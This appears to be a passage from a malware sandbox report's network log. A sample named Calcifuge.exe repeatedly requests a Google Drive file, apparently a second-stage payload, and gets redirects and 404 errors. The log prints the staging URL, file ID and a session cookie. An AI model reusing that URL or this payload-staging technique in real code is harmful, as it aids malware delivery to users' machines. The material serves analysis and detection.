                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.453467172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:42 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:43 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgStLaXLA5F7jhOZoBjqve3Ri0jfMLb8sp5dm8vLPm9bhuQagsGQjc0H6Po-lVBYacKMvo6dypk
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:42 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-h03F0nUFcjZD2fa8L9J-CQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:43 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 4e 4f 33 4c 63 30 77 76 6d 6e 49 64 36 45 32 47 57 64 67 52 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XNO3Lc0wvmnId6E2GWdgRQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.453468172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:43 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:44 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:44 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'nonce-FYCbSiJLrpNPnjNn_3VhyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.453469172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:45 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:45 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQla8hEoLIPGTXtf1KCnznk0msrobAKyzJL8Wc-EpU1Y38sm-fRc5Vr1DIQUcq6ISJ-
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:45 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-ehqt-zmHN5zrtQqTbCQ9hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 34 47 6f 77 63 49 46 78 43 71 74 79 59 71 4b 6e 75 73 44 36 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="64GowcIFxCqtyYqKnusD6A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.453471172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:46 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:46 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:46 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-8jKWHb7oxA5eFx9RrZFCOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.453477172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:47 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:47 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgR5zaczAEHKGYUdK-yO54xlSgj-yZBID855b95pOWM9xCHc13xYaF76dvWV_Y6KJrM7
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:47 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-76epgjJ0rDguqb2wlieR3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 41 34 54 4d 30 79 6d 79 59 6b 50 4f 41 47 37 49 4c 6b 6d 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EA4TM0ymyYkPOAG7ILkmAw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.453484172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:48 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:49 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:48 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-lCkQhji9cuuutypmjYS4-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.453494172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:49 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:50 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgRuUbV_aVg_Sd2zOcCY5b2hf0QFmeJwt6IqUH4VPI8uH7bwDS9NzfL6XL2VUJV16PYG
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:49 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-fiMcf5HKxjiMN9Nm3BCX6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 33 33 4b 36 6d 4f 65 36 49 63 45 4c 6e 51 75 6d 2d 79 6c 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n33K6mOe6IcELnQum-ylWA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.453500172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:50 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
